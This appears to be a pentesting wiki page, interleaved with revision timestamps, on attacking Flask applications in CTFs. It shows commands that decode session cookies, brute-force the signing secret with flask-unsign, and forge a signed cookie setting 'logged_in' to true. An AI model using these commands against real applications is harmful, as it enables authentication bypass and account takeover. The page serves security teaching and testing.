2020-07-15 15:43:14 +00:00
# Flask
2021-06-07 09:30:58 +00:00
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI** ](../../pentesting-web/ssti-server-side-template-injection/ )**.**
2020-07-15 15:43:14 +00:00
## Cookies
2020-11-22 23:24:53 +00:00
Default cookie session name is ** `session` **.
2020-07-15 15:43:14 +00:00
### Decoder
Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi ](https://www.kirsle.net/wizards/flask-session.cgi )
#### Manual
Get the first part of the cookie until the first point and Base64 decode it>
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
echo "ImhlbGxvIg" | base64 -d
```
The cookie is also signed using a password
### **Flask-Unsign**
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{% embed url="https://pypi.org/project/flask-unsign/" %}
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
pip3 install flask-unsign
```
#### **Decode Cookie**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
#### **Brute Force**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --unsign --cookie < cookie.txt
```
#### **Signing**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### Signing using legacy \(old versions\)
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
####